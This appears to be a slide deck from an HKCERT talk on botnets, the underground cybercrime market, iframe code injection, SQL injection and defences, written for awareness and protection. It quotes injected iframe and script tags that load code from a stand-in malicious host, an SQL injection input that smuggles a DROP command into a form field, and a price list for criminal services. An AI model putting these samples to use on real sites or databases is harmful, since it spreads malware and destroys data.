Docstoc

Botnet and Code Injection Attack

Document Sample
Botnet and Code Injection Attack Powered By Docstoc
					Botnet and Code Injection Attack




          S.C. Leung
          CISSP CISA CBCP
 HKCERT

    CERT Teams in Asia Pacific                                         CERT Teams around the World
    亞太區其他協調中心                                                                    全球其他協調中心
                         CERT
                         CERT                                               CERT
                                                                            CERT
                                  CERT
                                  CERT                               CERT
                                                                     CERT
                CERT
                CERT                                                                CERT
                                                                                    CERT
                                                              CERT
                                                              CERT
            CERT
            CERT      APCERT
                      APCERT                                           FIRST
                                                                       FIRST               CERT
                                                                                           CERT




                                                                       Virus & Security
                Law Enforcement
                                                                       Research Centre
                   執法機關
                                                                     電腦病毒及保安研究中心


                                         Local Enterprise &
                                           Internet Users
                                         本地企業及互聯網用戶

                     ISP                                                Software Vendorr
                   互聯網供應商                                                  軟件供應商


                                              Universities
Page ! 2                                         大學
Agenda

 Botnet and Code Injection Attack
    " Cyberspace – the New Business Platform for Whom?
           " Incentives of Cyber Attack
           " The Underground Economy

    " Botnet – Attacker’s infrastructure
    " Code Injection & SQL Injection Attack
    " Protection Strategies




Page ! 3
Cyberspace - the New Business Platform
               for Whom?
     Cybercrime for Sale
"     Services:
      DDoS attacks
      The price usually depends on the attack time:
                   1 hour - US$10-20 (depends on the seller)
                   2 hours - US$20-40
                   1 day - US$100
                   + 1 day - From US$200 (depends on the complexity of the job)
      It is worth highlighting that they normally offer 10 minutes testing, this means that if you are interested, you tell them the server
      and they will perform a DoS attack for 10 minutes, so that you can evaluate the ‘service’.
      Spam Hosting: US$200
      Dedicated spam server US$500
               +10,000,000 Mails per day US$600
      SMS spam (per message) US$0.2
      ICQ (1,000,000) US$150

      Mailing lists for spam: (US$)
      ACCOUNTS USA GERMANY RUSSIA UKRANIA
      1,000,000 100 100 100 100
      3,000,000 200 200 200 200
      5,000,000 300 300 300 -
      8,000,000 500 500 500 -
      16,000,000 900 - - -
      32,000,000 1500 - - -

      Hiding of executable files. To avoid antivirus programs and firewalls (They guarantee that the files won’t be detected even by
      the antivirus updates of the date of purchase): From US$1 to US$5 per executable file (cheap, isn’t it?)
      Accounts FTP accounts: US$1 per account
      50MB of Limbo Trojan logs US$30 (contains email accounts, bank account #, credit card #, etc. A percentage is guaranteed)
      Icq numbers: fromUS$1 to US$10 (depending on the ICQ number)
      RapidShare premium accounts: 1 month - US$5
               2 months - US$8
               3 months - US$12
               6 months - US$18
               1 year - US$28
    Page ! 5
      Online Shops accounts (megashop.ru, bolero.ru, cup.ru...etc ALL RUSSIAN): US$50 each.
 Incentives of Cyber Attacks
                        #   Incentives: Financial, political, or for fun


 Achievement,                "   Piracy: theft of CD Keys

 Financial,                  "   Theft of Personal Information and Identification
                                 (SSN, id, password, cc #.)
 Fun, Interest,              "   Spam: paid spam relays
 Political, Religion,        "   Phishing attacks: paid web hosting
 Revenge                     "   Spyware/adware installation: pay per installation
                             "   Click fraud: pay per click
                             "   DDoS: extortion or competitor service site attack
                             "   Blackmail / Ransomware
                                   #   encrypts hard drive data $ demand ransom



Page ! 6
Visibility of Malware vs. Malicious Intent

                                             Mass mailing virus                                 highly profitable
                                                                       Worms by                 cybercrime
           Visibility and malicious intent


                                                 Visib                 hacking
                                                       ility
                                                                                    Phishing




                                                                                                       Botnet



                                             Fame and Glory                  tent
                                                                     io us in
                                                               Malic

                                                                             time

                                                                                                      Source: GOVCERT.NL
                                                                            http://www.oecd.org/dataoecd/34/36/38653287.pdf

Page ! 7
Botnet - Attackers’ IT Infrastructure
Botnet (roBot Network)



                                                      Up: Data
                                   Bot Herder         Down: Command/Update




                 C&C                C&C                         C&C
                                                                       Up: Data
                                                                       Down: Command/Update




           bot      bot      bot   bot        bot         bot         bot


             Spam                                        DDoS attack

                          victim         victim


Page ! 9                                               Wikipedia not totally correct in “botnet”,
                                                    Botnet is much more than DDOS platform.
 Botnet Fire Power in Real Fight

 #     Estonia DDOS (2007-May )
            "   58 Estonia web sites encountered DDOS attack from thousands of botnet computers

            "   Response to Estonia relocating a Soviet-era memorial
       http://news.cnet.com/8301-10784_3-9721429-7.html?hhTest=1



 #     CNN DDOS (2008-Apr)
            "   CNN filtered traffic in response to attempts to disruption, causing some Asian users impacted

            "   Response to CNN report on Tibet
       http://www.infoworld.com/article/08/04/23/CNN-site-hit-by-China-attack_1.html



 #     Lithuania mass defacement (2008-Jul)
            "   300 Web sites defaced with pro-Russian slogans

            "   Response to a law outlawing Soviet symbols in Lithuania
       http://news.cnet.com/8301-10789_3-9983940-57.html?hhTest=1


Page ! 10
Malware 2.0


! Evade detection                    ! Command and control
  – Keep low profile (see figure)     – Receive data from victim
  – Encrypt or encode
                                      – Command victim action
  – Keep on changing; use rootkit
    technology                        – Malware update

  – Targeted attack                     • Patch / Upgrade
  – Terminate security software         • AV detection signature
  – Test against known AV software




Page ! 11
Attackers Expand the Botnet Colony

        Maximizing malware attack surface
 Legitimate sites compromised to host malware




Page ! 13
Legitimate site with embedded third party information serving
malware

! Embedded Third Party information (and Banner Ad) on a web page is
  something hard to control by web master
  – Travel site, music service site have many banner ads
  – News site subscribes third party financial information from example
    aastocks.com




Page ! 14
 Redirection of attacks
 #     Exploits imported from other servers via iframes, redirects


            Malicious Web server                                      Exploit server                                Malicious Web server




                                                                  r                    Re
                                                          e   rve                           dir
                                                     it s                                       ec   ted
                                                xplo                                                       to
                                           oE                                                                 E
                                     e   dt                                                                       xpl
                                                                                                                     oit
                                 ec t                                                  Se                                  s er             Web request
                              dir                                                         rve                                     v er
        Web request         Re                       ge                                       E   xpl
                                                   pa                                                oit
                                             oit                                                         pag
                                      E   xpl                                                               e
                                  rve
                               Se




                                                                                                                                         Browser
                 Browser



Page ! 15
 Web-borne Malware Infection

 #     ScanSafe Report 2008 (May-07 to May-08)                                Web Attack 2008 H1 (ScanSafe)

        http://www.scansafe.com/threat_center/threat_alerts/stat_security_brief         5%
                                                                                             7%
        "   66% malware comes from legitimate sites
        "   Web-Borne Malware Up 278%                                                             12%



             • 76% SQL injection

 #     Websense Report Jan 2008                                                                         SQL injection
                                                                                                        PHP
                                                                                                        Stolen FTP
                                                                                                        credentials
                                                                             76%
                                                                                                        Others

        #   51% points of infection were compromised
            legitimate sites




Page ! 16
Bulletproof hosting

  #         Guarantee access to their network
            "   gain access to network with trusted BGP Peers so as to get their
                network existence announced
            "   use other ‘friendly’ service providers to host their service
                #   good bandwidth and lax control


            #   A report “Atrivo - Cyber Crime USA“ in 2008 disclosed that the network
                service provider Atrivo (or Intercage) failed to respond to abuses from
                hostings inside their network.
                http://rbnexploit.blogspot.com/2008/08/rbn-atrivo-cyber-crime-usa.html




Page ! 17
Code Injection
 iFrame (掛馬)

 #     Trustworthy web site having a vulnerability compromised, with web page
       injected an “invisible” script.
            "   e.g.
       <iframe width=1 height=1 src="http://www.mal-site.com/">
       </iframe>

            "   Visitor of the web page is redirected transparently to another web site
                which hosts malicious script.
        <script src=http://www.mal-site.com/1.js></script>



 #     Attraction to hackers:
            "   Better reach to victims
            "   Easier management
            "   More difficult for investigation
Page ! 19
Code Injection
- No visible injected code on web page
                                 Web page Looks fine on the face




    Embedded malicious scripts
       is seen when examined
Page ! 20
 Code injection : Evasion of detection

 #     Code obfuscation
            "   Evade signature-based detection
            "   Mind these functions: eval(), arguments.callee()




Page ! 21
SQL Injection
HTTP Request/Response
- Static Webpage

            1. Request Webpage



 User
 Agent
(Client)     4. Send Webpage

                                 Web Server




Page ! 23
HTTP Request/Response
Dynamic Webpage
                        User input




                              Dynamic content
                           depending on user input


Page ! 24
HTTP Request/Response
Dynamic Webpage

            1. Request Webpage

                                              2. Request Data
                                  Process
 User                             Request      3. Load Data
 Agent
(Client)     4. Send Webpage

                                                                Database
                                 Web Server
                                                                 Server




Page ! 25
HTTP Request/Response


            1. Request Webpage

                                               2. Request Data
                                  Process
 User                             Request       3. Load Data
 Agent
(Client)     4. Send Webpage

                                                                 Database
                                 Web Server
                5. Submit                                         Server
              Form with Data
                                  Process
                                  Form Data     6. Store Data
                                 via CGI/ASP
                                 /PHP/JSP…      7. Load Data
             8. Send Webpage
                With Results
Page ! 26
 SQL Injection


 #     What is "SQL Injection" ?
            "   web application which create SQL command on the fly         Sign up for Hahoo!

            "   but invalidated user input may cause the execution of   Already have a Hahoo! ID?
                unintended code.
            #   Example: SQL command with user input                    Hahoo! ID
                                                                        dummy' AND 1=0; DROP USERS
                SELECT passwd FROM USERS WHERE uname = '$INPUT';



            "   Hacker:
                 "   $INPUT=“dummy' AND 1=0; DROP USERS”
                               always false
            "   System sees:
                 #   SELECT passwd FROM USERS
                     WHERE uname = ‘dummy' AND 1=0; DROP USERS;’

Page ! 27
Live Demo
Using SQL Injection to implant and execute a file
    Root Cause of Injection
No validation and sanitization in user inputs
Code / SQL Injection


            1. Request Webpage

                                               2. Request Data
                                  Process
 User                             Request       3. Load Data
 Agent
(Client)     4. Send Webpage

                5. Submit                                        Database
                                 Web Server
              Form with Data                                      Server
              + Malformed
                 String            Process
                                  Form Data     6. Store Data
                                 via CGI/ASP   + SQL Attack
                                 /PHP/JSP…




Page ! 30
More Attacker Tactics
 Redirect users to fake plug-in/codec sites


! Surge in Facebook Malware
  15-Oct-2008


! TRUST:
  – Malware spoof as user’s friend,
    sending a message with an
    URL pertaining to be a
    YouTube movie


! REDIRECT:
  – URL brings user to a fake
    YouTube site
  – “Flash_update.exe”                http://www.f-secure.com/weblog/archives/00001517.html



Page ! 32
Password Reset Attack, and Search Query Poisoning




Page ! 33
Protection Strategies
    Hit criminals' critical infrastructure

   # Trace the supply chain of criminals (Law Enforcement)


   # Bring down their infrastructure (ISP, DNR)
            – C&C, Malicious web sites, fake domain names
            – Domain name registry manage domain registration abuse
            – ISP unplug malware hosting networks


   # Bring down spam borne attacks
            – Corps and ISPs to adopt Port 25 management (blocks SMTP); force
              spammer to use credentials but is more accountable (advocated by
              APWG, CERT)
                "   http://www.maawg.org/port25/
Page ! 35
  Botnet Take Down
            Jun-2007
            FBI “Operation Bot Roast” identified 1M+. Arrested 3 persons,
            including spam king Robert Soloway (47mth imprisonment)

               Oct-2008
               Atrivo/Intercage, malware hosting in USA
               unplugged

                   Nov-2008
                   McColo, a hosting provider in USA unplugged.
                   Spam volume dropped by 2/3.

                     Nov-2008
                     ICANN de-accredit EstDomains - whose CEO convicted for
                     credit card fraud, money laundering, and document forgery.

Page ! 36
   Client Defense

   "        Malicious web site
            "   Browsers add anti-malware, anti-phishing features
                 "   IE, Mozillia, Opera; add Netcraft toolbar if you want
                 "   Mind your browser and plug-ins


   "        Malware morph so fast to be detected
            "   Still requires baseline defence (anti-malware, firewall, patching) –
                though insufficient
            "   Blacklist falls; Whitelist approach proposed but open to debate


   "        Detect botnet
            "   Monitor OUTGOING network traffic for botnet


Page ! 37
Coping with morphing malware

"   Malware morph so fast
    to be detected
    "   Sandbox: malware
        analysis by behaviour


"   Use Whitelist approach
    instead of Blacklist


"   Security awareness
    comes into play $ more
    education!




Page ! 38
                                http://www.threatexpert.com/reports.aspx
Google Safe Browsing

  Firefox and Flock browser now incorporate Google safety alert.




Page ! 39
   Server Defense


 "     Minimize and guard all entry points


 "     Close all flaws in application
            "   Hackers look into applications. Network filtering
                firewall are blind in application attacks


 "     Back to Basic – Treat ALL User Inputs EVIL!
            "   Validate all inputs in web applications
            "   Runtime Vulnerability Assessment
            "   Application Firewall: modsecurity, URLScan



Page ! 40
Prevention and Detection of Code/SQL Injection

1.          Code-Level
              •   Coding Practice, Code Scanning
              •   This is ultimate defense
2.          Database-Level:
              •   Minimum privilege of database user account
              •   Avoid some commands
3.          Vulnerability Scanning
              •   scan for SQL injection vulnerabilities
4.          Application Firewall / HTTP Filtering
              •   Use modsecurity and URLscan to block sensitive commands




Page ! 41
Prevention and Detection of Code Injection


            1. Request Webpage

                                               2. Request Data
                                  Process
 User                             Request       3. Load Data
 Agent
(Client)     4. Send Webpage

                5. Submit                                        Database
                                 Web Server
              Form with Data                                      Server
              + Malformed
                 String            Process
                                  Form Data     6. Store Data
Vulnerability
                                 via CGI/ASP   + SQL Attack
Assessment
                                 /PHP/JSP…


                                                   Database
            Application
                                                     level
Page ! 42    Firewall            Code review       validation
                                 of web apps
HKCERT Guideline

! SQL 資料隱碼防護指引
  http://www.hkcert.org/english/sguide_faq/sguide/sql_injection_en.pdf
  http://www.hkcert.org/chinese/sguide_faq/sguide/sql_injection_en.pdf




Page ! 43
   Q&A


S.C. Leung (梁兆昌)
 scleung@hkcert.org

				
DOCUMENT INFO